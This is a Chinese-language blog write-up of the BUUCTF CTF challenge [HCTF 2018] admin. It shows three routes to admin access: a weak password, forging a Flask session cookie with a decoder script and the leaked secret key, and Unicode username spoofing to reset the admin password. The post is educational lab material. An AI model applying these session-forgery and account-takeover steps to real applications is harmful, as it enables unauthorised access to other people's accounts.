BUUCTF [HCTF 2018] admin

最新推荐文章于 2024-05-18 15:30:14 发布
最新推荐文章于 2024-05-18 15:30:14 发布
阅读量964 收藏 5
点赞数
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF HCTF 2018 admin writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/110943922
版权

BUUCTF [HCTF 2018] admin

考点:

  1. 弱密码
  2. Flask伪造session
  3. Unicode欺骗

启动环境:
在这里插入图片描述
简洁的页面和一个菜单栏,菜单栏中包含登陆注册功能
查看网页源码,发现提示:

<!-- you are not admin -->

提示需要用admin用户登陆

解法一:弱密码

尝试使用admin登陆,密码123
在这里插入图片描述
登陆成功,可以得到flag

首先注册正常的账户:

test
test

在这里插入图片描述
登陆成功后,进入到主页,其中菜单栏包含页面:indexpostchange passwordlogout
在这里插入图片描述
post页面是一个类似文章发布或留言板的功能,change password页面是修改密码功能
在这里插入图片描述
在各页面查找提示时,在修改密码界面源码中查找到:

<!-- https://github.com/woadsl1234/hctf_flask/ -->

尝试从Github下载源码:
在这里插入图片描述
源码为Flask框架,查看其路由页面:

@app.route('/code')
@app.route('/')
@app.route('/index')
@app.route('/register', methods = ['GET', 'POST'])
@app.route('/login', methods = ['GET', 'POST'])
@app.route('/logout')
@app.route('/change', methods = ['GET', 'POST'])
@app.route('/edit', methods = ['GET', 'POST'])
@app.errorhandler(404)

存在登陆注册修改密码edit等功能

解法二:Flask伪造Session

Flask中的session是存储在客户端的cookie中,也就是存储在本地,Flask对数据进行签名防篡改。而Flask并没有提供加密,所以session可以在客户端中被读取。

参考:Flask中的session

在本题中routes.py页面,导入了session方法:

from flask import xxx, session, xxx

使用BurpSuite抓取数据包:
在这里插入图片描述
可以获取到session

session=.eJw9kEGLwjAQhf_KMmcPGu1F8FBJ3W1hElrihslF1K22SeNCW9FW_O8bXPA0DG_me2_mAbtTW3YVLPv2Wk5gV__A8gEfB1gC6WQueeMEK7xg28HoopHcRWiNNTyJcDSOxnVNNr0LnYUaL6Q2VtjtSAwjydc18u8axybM4dTYfJAqszRWDbGskpzuwmYOPzcVqvROPr8hj6eSGy9szqSqKlJx8DsyobZz9MFf00z4kEflQ-gDN1kYla_gOYFj1552_a8rL-8ThC4s8swKlQbEkZHeWBzdHO15hjqs-iQynEK0jSOVDjS6hYhXL1zt9-fyTTJfTV3c_pXL3gcB-rLrYQLXrmxfb4PZFJ5_IUVs2g.X9GIFw.jVsoklHDPjPIBeBhQ5i4TpNd5xw

使用Python3脚本进行解密:

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

python3 main.py session

在这里插入图片描述
得到解密后的session信息:

{'_fresh': True, '_id': b'aa789d7df7e2ede89926cd1936dc0bb215bbb089fc653cc980b05b39dc34f4292cc8ecba86162d0aa121bd000486f64698aa092765572de9f56df5422ddc18e4', 'csrf_token': b'5dc02c526576aac3972851a8fa9d64f1da22c984', 'image': b'dybG', 'name': 'test', 'user_id': '10'}

要想构造admin用户的session,还需获取到SECRET_KEY的值,SECRET_KEY是Flask中的通用密钥,主要在加密算法中作为一个参数,这个值的复杂度影响到数据传输和存储时的复杂度,密钥最好存储在系统变量中。

通过对本题源码的分析,在config.py页面中找到:

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

其中SECRET_KEY的值为:ckj123,在本地构建Flask应用,生成SECRET_KEY伪造adminsession

sesion=eyJuYW1lIjoiYWRtaW4ifQ.X9GQxA.tPYjWZMjsyIGLwe1kr8xNkLFYFk

获得伪造后的session,构造本题所需的session

{'_fresh': True, '_id': b'aa789d7df7e2ede89926cd1936dc0bb215bbb089fc653cc980b05b39dc34f4292cc8ecba86162d0aa121bd000486f64698aa092765572de9f56df5422ddc18e4', 'csrf_token': b'5dc02c526576aac3972851a8fa9d64f1da22c984', 'image': b'dybG', 'name': 'admin', 'user_id': '10'}

将原本的name修改为admin,使用flask-session-cookie加密脚本Github地址

python3 flask_session_cookie_manager3.py encode -s "ckj123" -t "session..."

在这里插入图片描述
得到加密后的session

.eJw9kEGLwjAQhf_KMmcPGu1F8FBJ3W1hElrihslFXK02SeNCVbQV__sGFzwNw5v53pt5wObQ1ecG5pfuWo9gY_cwf8DHD8yBdDaVvPWCVUGwdW901UruE3TGGZ4lOBhPw9KSy-9CF7GmM6mNE249EMNE8qVF_m1xaOMcjo0re6kKR0PTEisayekuXOHxc9Wgyu8UyhvydCy5CcKVTKqmIZVGvx0Taj3FEP01TUSIeVTZxz5ys5lR5QKeI9idu8Pm8uvr0_sEoSuHvHBC5RGxY6RXDgc_RXecoI6rIUsMpxht5UnlPQ1-JtLFC2fD9li_SeartdXtXzltQxRguw_2BCO4nuvu9TeYjOH5B44CbSM.X9GUGA.w4nTRxBXiA9uaoA22WXhQe1vmGY

使用BurpSuite抓取数据包,修改其中session信息:
在这里插入图片描述
发送数据包,得到flag
在这里插入图片描述
没有修改user_id的值,在index.php页面源码中:

{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 class="nav">Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>
{% endif %}
<!-- you are not admin -->
<h1 class="nav">Welcome to hctf</h1>

{% include('footer.html') %}

发现其值判断了session中的name属性,其值为admin,即可输出flag。

解法三:Unicode欺骗

route.py页面中,查看到register()函数、login()函数、change()函数都包含:

def register():
        name = strlower(form.username.data)

def login():
        name = strlower(form.username.data)
        session['name'] = name

def change():
        name = strlower(session['name'])

其中都是用strlower()来转为小写,没有使用Python自带的lower()函数,详细查看该函数:

def strlower(username):
    username = nodeprep.prepare(username)
    return username

通过查阅资料,nodeprep.prepare()函数的原理就是会将unicode字符转换成A,而A再调用一次nodeprep.prepare()函数会把A转换成a

ᴬᴰᴹᴵᴺ -> ADMIN -> admin

以上为转换过程,我们可以通过这种方式伪造admin用户,即注册用户ᴬᴰᴹᴵᴺ,在登陆时,用户名通过strlower(form.username.data)会转化为:ADMIN。修改密码时,strlower(session['name'])会将ADMIN转化为admin,所以可以修改admin用户的密码。

首先注册用户ᴬᴰᴹᴵᴺ
在这里插入图片描述
在成功登陆后,用户已转变为:ADMIN
在这里插入图片描述
此时修改密码为:test
在这里插入图片描述
修改成功:
在这里插入图片描述
经过两次转化,修改的应为用户admin的密码,尝试登陆:
在这里插入图片描述
登陆成功,获得flag

Senimo_
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 464
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session,
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2875
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
BUUCTF 弱口令 1
最新发布
YueXuan_521的博客
05-18 347
尝试了各种方法均无效,最后使用lsb隐写提取出flag,使用密钥123456,对应题目“弱口令”。老菜鸡,伤了神,别灰心,莫放弃,试试弱口令 注意:得到的 flag 请包上 flag{} 提交。得到一个zip压缩包,但是有密码。用Bandizip打开,得到一些空格和换行符组成的信息。使用Sublime Text打开,选中可以更清楚地看到,看着很像摩斯密码,实际上就是。解压缩zip压缩包,得到一张名为“女神.png”的图片。使用在线工具解码,得到zip压缩包的密码。
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3264
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin,大概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 490
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
BUUCTF:[HCTF 2018]admin
末初的CSDN博客
10-28 773
题目地址:https://buuoj.cn/challenges#[HCTF%202018]admin 第一种解法:弱密码 根据提示,尝试弱密码登录admin用户,当admin的密码为123时,登陆成功 第二种解法:Unicode欺骗 随便注册个用户mochu7,在Change Password 给出来题目源码,/hctf_flask/app/rotus.py register和login对用户名使用了自定义函数strlower() nodeprep.prepare()来自 from tw.
2018手工更新FlatLab Admin Template
09-15
"2018手工更新FlatLab Admin Template"是一款专为后台管理系统设计的模板,它集成了现代化的设计风格和丰富的功能组件。FlatLab以其扁平化的设计理念,提供了高效且直观的用户界面,使得管理员能够轻松地进行数据...
fastadmin事务管理系统
05-27
FastAdmin事务管理系统 FastAdmin事务管理系统是一种基于Web的事务管理系统,旨在帮助管理员更好地管理事务流程和数据。下面是该系统的一些重要知识点: 登录 Token 设计 FastAdmin的事务管理系统使用 Token-...
Ace Admin 2018.4最新版
04-17
"Ace Admin 2018.4最新版" 提供了最新的更新和改进,确保了开发者可以利用最新的技术进行开发。 Ace Admin 的核心特性包括: 1. **响应式布局**:它支持各种设备,从小屏幕手机到大屏幕桌面,都能提供良好的用户...
Ace Admin 前端框架
05-30
Ace Admin 前端框架
[BUUCTF][HCTF 2018]admin
cosmoslin的博客
11-16 1142
考点 flask session伪造 unicode欺骗 条件竞争 法一:flask session伪造 查看源码,提示you are not admin,猜测需要admin登录 注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码 是一个flask框架,进入routes.py,看一下注册和登录部分的源码 @app.route('/register', methods = ['GET', 'POST']) def register(): if current_
BUUCTF Web [HCTF 2018]admin
网安小趴菜
10-12 633
BUUCTF Web [HCTF 2018]admin
CTFbuuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1797
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
BUUCTF [HCTF 2018]admin
qq_42158602的博客
01-11 1076
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面 查看一下源码 有个注释 应该是提示我们用admin账号登录 先随便注册一个账号看看 登录成功后有三个界面 随便看了看 先去登录注册页面试试有什么注入没有 在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性 报错了 ,好像没行。不过这界面还能运行python 可以看见一些东西 ,感觉...
[HCTF 2018]admin
m0_62879498的博客
04-15 2082
[HCTF 2018]admin 一进入页面,发现,在未登录的情况下,我们只能访问3个页面index、login、register 同时我们观察 index 下的源码,发现 you are not admin 提示我们要进行登录 登录admin 可以进行 弱密码破解、sql访问数据库查看密码 当然,如果没有密码也可以,利用csrf漏洞,跨站请求伪造,让服务器以为我们是 admin 先进行弱密码破解,使用burpsuite 发现密码是 123 登录,获得flag 使用 bp 进行弱密码破解 破解
BUUCTF admin
biggerpig的博客
09-24 885
buuctfweb类型admin题目
2018安恒杯12月月赛复现
Gard3nia的博客
03-02 921
前言 萌新因为种种原因没有做安恒12月的月赛题,正巧这几天发现复现,又学到了新知识! 正文 Web easy 题目index.php给出源码: &lt;?php @error_reporting(1); include 'flag.php'; class baby { public $file; function __toString() { ...
攻防世界 Bug
CyhDl666的博客
02-24 904
进入界面随便注册一个root账号 点击Manage 页面返回Sorry,You are not admin! 需要用 admin账号 注册发现该账号已经被注册过了 发现有一个Findpwd界面 可以重置密码 问题来了 我不知道admin账号的生日和地址 先尝试一下改自己前面申请的root账号 改一下密码试试 这里要一直抓包 改掉username为admin尝试了一下 依然是成功的 所以这里admin的账号的密码就被改了 用admin登录 进入manage界面有提示IP NOT allowed burp.
adminguide翻译
01-06
网站典型设置概览应用软件或中间件服务器:JBoss App Server,Tomcat Web Container,BEA WebLogic,IBM Webshere

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值